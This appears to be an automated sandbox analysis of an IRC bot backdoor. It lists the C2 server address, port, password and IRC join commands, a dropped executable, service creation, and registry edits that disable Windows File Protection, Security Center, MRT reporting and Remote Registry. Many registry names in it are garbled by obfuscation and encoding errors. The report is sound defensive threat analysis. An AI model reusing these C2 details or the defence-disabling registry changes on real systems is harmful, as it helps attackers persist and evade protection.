210.166.223.51 (Mouse’s net)

Remote Host Port Number
210.166.223.51 3305 PASS secretpass

NICK P|fpt5tg83v
USER azrqhtwi7 * 0 :USA|XP|706
USERHOST P|fpt5tg83v
MODE P|fpt5tg83v
JOIN #h-r xh10

Other details

* The following port was open in the system:

Port Protocol Process
1052 TCP uninsta.exe (%FontsDir%\uninsta.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\InprocServer32
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\InprocServer32\2.0.50727
o HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\Server
o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT
o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT
o HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Windows File Protection
o HKEY_LOCAL_MACHINE\SOFTWARE\Licenses
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\InprocServer32\2.0.50727]
+ ImplementedInThisVersion = “”
+ (Default) = “2.0.50727”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\Server]
+ (Default) = “diasymreader.dll”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}\InprocServer32]
+ (Default) = “mscoree.dll”
+ ThreadingModel = “Both”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8E899F5A-F1AA-76AE-F1AA-76AEF1AA76AE}]
+ (Default) = “Pdb based CorSymWriter”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
+ DoNotAllowXPSP2 = 0x00000001
o [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\MRT]
+ DontReportInfectionInformation = 0x00000001
o [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Windows File Protection]
+ SFCDisable = 0xFFFFFF9D
+ SFCScan = 0x00000000
o [HKEY_LOCAL_MACHINE\SOFTWARE\Licenses]
+ {K7C0DB872A3F777C0} = 83 6C 90 8F 88 10 1F 68 77 3F 6D 07 1E 46 2E 03 07 99 01 65 14 0F C8 1F F3 29 FB 4A 8D 7D 4C FF FF FF FF 87 30 0C C3 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF F
+ {IF106C3E13EC6EFFB} = 06 00 00 00
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control]
+ WaitToKillServiceT = “5000”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control]
+ *NewlyCreated* = 0x00000000
+ ActiveService = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000]
+ Service = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
+ Legacy = 0x00000001
+ ConfigFlags = 0x00000000
+ Class = “LegacyDriver”
+ ClassGUID = “{8ECC055D-047F-11D1-A537-0000F8753ED1}”
+ DeviceDesc = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
o [HKEY_LOCAL_MACHINESYSTEMControlSet001EnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081]
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum]
+ 0 = “RootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000”
+ Count = 0x00000001
+ NextInstance = 0x00000001
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security]
+ Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
o [HKEY_LOCAL_MACHINESYSTEMControlSet001Services?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����]
+ Type = 0x00000110
+ Start = 0x00000002
+ ErrorControl = 0x00000000
+ ImagePath = “”%FontsDir%\uninsta.exe””
+ DisplayName = “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����”
+ ObjectName = “LocalSystem”
+ FailureActions = 0A 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 B8 0B 00 00
+ Description = “?}n�DI6f?�oE?����3���r’c������?�k
o [�䯇������H?��ӈ�~�b-��ذ�G ��o�|YC.p]
+ ��?$�h������,’����� �?�Q” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControl
+ ��?$�h������,’����� �?�Q” = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings
o [WaitToKillServiceT]
+ “5000” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o [*NewlyCreated*]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000Control
o [ActiveService]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Service]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Legacy]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [ConfigFlags]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [Class]
+ “LegacyDriver” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [ClassGUID]
+ “{8ECC055D-047F-11D1-A537-0000F8753ED1}” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000
o [DeviceDesc]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetEnumRootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081
o [NextInstance]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Security
o [0]
+ “RootLEGACY_*0019V[*00FEZY+2_*00A1^E*001E*00B8*00A1*201D*00BA(*00E0*00A2*00E8H;X*00FC*00B9*00C5*00D1*0192*00A7*00B8*001E*00ADYW*00AB*00C8*00B8*00B2*00FF*00C7*00D8*00A3*00AB*00F8*0161*0081000” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o [Count]
+ 0x00000001 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����Enum
o [Security]
+ 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Type]
+ 0x00000110 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Start]
+ 0x00000002 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ErrorControl]
+ 0x00000000 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ImagePath]
+ “”%FontsDir%uninsta.exe”” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [DisplayName]
+ “?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [ObjectName]
+ “LocalSystem” = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [FailureActions]
+ 0A 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 B8 0B 00 00 = HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ����
o [Description]
+ “?}n�DI6f?�oE?����3���r’c������?�k = �䯇������H?��ӈ�~�b-��ذ�G ��o�|YC.p
o [��?$�h������,’����� �?�Q”]
+ HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings = MaxConnectionsPer1_0Server
o [0x0000FFFE]
+ HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings = MaxConnectionsPerServer
o [MaxConnectionsPer1_0Server]
+ 0x0000FFFE = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings
o [MaxConnectionsPerServer]
+ 0x0000FFFE = HKEY_USERS.DEFAULTSoftwareMicrosoftWindowsCurrentVersionInternet Settings

* The following Registry Values were modified:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
+ EnableDCOM =
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
+ AntiVirusOverride =
+ FirewallOverride =
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ServiceCurrent]
+ (Default) =
o [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ServiceCurrent]
+ (Default) =
o [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
+ Cookies =
+ History =

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
uninsta.exe %FontsDir%\uninsta.exe 5 505 024 bytes

* There was a new service created in the system:

Service Name Display Name Status Service Filename
?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ���� ?V[�zY+2 �^E?����(��h;x���у��?�yW�ȸ���أ���� “Running” “%FontsDir%uninsta.exe”

* The following system services were modified:

Service Name Display Name New Status Service Filename
RemoteRegistry Remote Registry “Stopped” %System%\svchost.exe -k LocalService
wscsvc Security Center “Stopped” %System%\svchost.exe -k netsvcs

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 %FontsDir%\uninsta.exe 626 688 bytes MD5: 0xC2F899C23ED9C7AC041C007B646522BB
SHA-1: 0x259D7C083B287C46EC39E35E23FCAFFB0485D65F Backdoor:Win32/IRCbot.gen!M [Microsoft]
packed with Armadillo [Kaspersky Lab]

* Note:
o %FontsDir% is a variable that refers to the virtual folder containing the system's fonts. A typical path is C:\Windows\Fonts.

* The following Alternate Data Stream was created in the system:

# ADS name(s) ADS Size ADS Hash
1 %CommonAppData%\TEMP:755E6E72 124 bytes MD5: 0x69936C4D9656BEC05BC63F64F4964ED9
SHA-1: 0xC88F3FA88EE34AF5113B4B6F1B7EB109C0CC9281
